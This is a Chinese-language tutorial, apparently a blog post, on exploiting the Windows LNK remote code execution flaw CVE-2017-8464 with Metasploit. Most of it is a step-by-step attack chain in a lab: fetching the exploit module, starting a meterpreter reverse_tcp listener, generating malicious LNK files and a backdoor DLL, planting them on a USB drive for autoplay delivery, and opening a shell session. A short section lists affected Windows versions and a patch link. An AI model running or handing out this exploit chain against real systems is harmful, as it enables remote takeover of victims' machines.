msf下的LNK漏洞(CVE-2017-8464)利用
0x01 前言
RCE漏洞存在于Windows处理LNK文件的环节。攻击者利用漏洞可以获得与本地用户相同的用户权限。被使用此漏洞攻击时,用户权限较少的账户相较管理员权限的用户受到的影响更小。
攻击者可以给受害者一个恶意的LNK 文件和关联的恶意二进制,文件可以存放在可移动磁盘或远程共享中。当用户用 Windows 资源管理器或任何其他能够解析LNK文件的软件,打开此驱动器 (或远程共享) 时,恶意文件就会在目标系统上执行攻击者的代码。
0x02 漏洞环境搭建与利用
漏洞环境搭建:
kalix86 192.168.1.109 攻击机
windows7x64 192.168.1.101 目标靶机
漏洞利用:
1.kali主机下载cve_2017_8464_lnk_rce.rb:
cd /opt wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447324df064192db62cdc5b5b860/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
2.将cve_2017_8464_lnk_rce.rb拷贝到
/usr/share/metasploit-framework/modules/exploit/windows/smb/目录下:
cp cve_2017_8464_lnk_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
3.生成监听shell:
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.109 msf exploit(handler) > exploit -j
4生成大量的.LNK文件(对应盘符从D盘到Z盘)和要加载的.dll文件(后门文件, copy了一个lnk文件(根据插入靶机U盘后识别的盘符,例如我插入U盘后显示的E盘,所以就选择了E结尾的lnk文件)和dll文件到U盘)
msf exploit(handler) > back msf > use exploit/windows/smb/cve_2017_8464_lnk_rce msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.1.109 msf exploit(cve_2017_8464_lnk_rce) > exploit
5.将/root/.msf4/local/*所有文件拷贝到/opt目录下的test文件夹中,然后拷贝到目标靶机windows7X64上
root@backlion:~# cd /opt root@backlion:/opt# mkdir test root@backlion:/opt# cp /root/.msf4/local/* test/ root@backlion:/opt# cd test/ root@backlion:/opt/test# ls
拷贝的本机win7x64上:
6.然后点击快捷键,就会触发注册dll文件,如果不行直接注册dll文件(一般是将这项快捷键和DLL文件拷贝到一个文件夹里面然后拷贝到U盘,只要对方开了U盘自动启动播放功能,就会自动触发注册dll文件)
7.在kali下可以看到成功获得sesions会话为1
sessions -i 1
8.然后进入到会话,就会成功进入到metermter的shell界面:
0x03漏洞影响与修复
漏洞影响:
Windows 10
Windows 7
Windows 8.1
Windows RT 8.1
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
漏洞修复:
下载补丁,其地址为:
https://support.microsoft.com/zh-cn/help/4025686/microsoft-security-advisory-4025685-guidance-for-supported-platforms
相关文章
- 软件漏洞分析简述
- android Activity漏洞挖掘
- 2022-09微软漏洞通告
- 任意用户注册漏洞(身份认证缺失)
- Apache ActiveMQ任意文件写入漏洞
- 干货 |RCE漏洞原理及利用演示(远程代码执行)
- Meta裁掉ML研究团队;KataGo神经网络漏洞可让业余棋手取胜 |AI一周快讯
- DVWA漏洞演练平台 - 文件上传
- AutoPWN-Suite:一款功能强大的自动化漏洞扫描和利用工具
- 多款本田车型存在漏洞,车辆可被远程控制
- Adobe Acrobat Reader获得安全更新修复已在野外被利用的零日漏洞
- OpenJDK 7的漏洞已经在Ubuntu 14.04 和Ubuntu 14.10中解决了
- Linux内核Waitid系统调用本地提权漏洞(CVE-2017-5123)的分析与利用
- 重要:使用微软Office 0day漏洞的新型攻击
- GitHub现VMware虚拟机逃逸EXP,利用三月曝光的CVE-2017-4901漏洞
- 利用《魔兽争霸3》漏洞传播的“萝莉”蠕虫分析
- Linux后门入侵检测工具,附bash漏洞最终解决方法
- Linux漏洞利用:远程指令执行(linux漏洞远程执行)
- 传统缓存的漏洞利用Redis缓存有效避免传统缓存漏洞(redis缓存如何处理)
- 惊天后续 | 不仅可看照片和短信, 利用 iOS 漏洞无需密码还能打电话、发短信!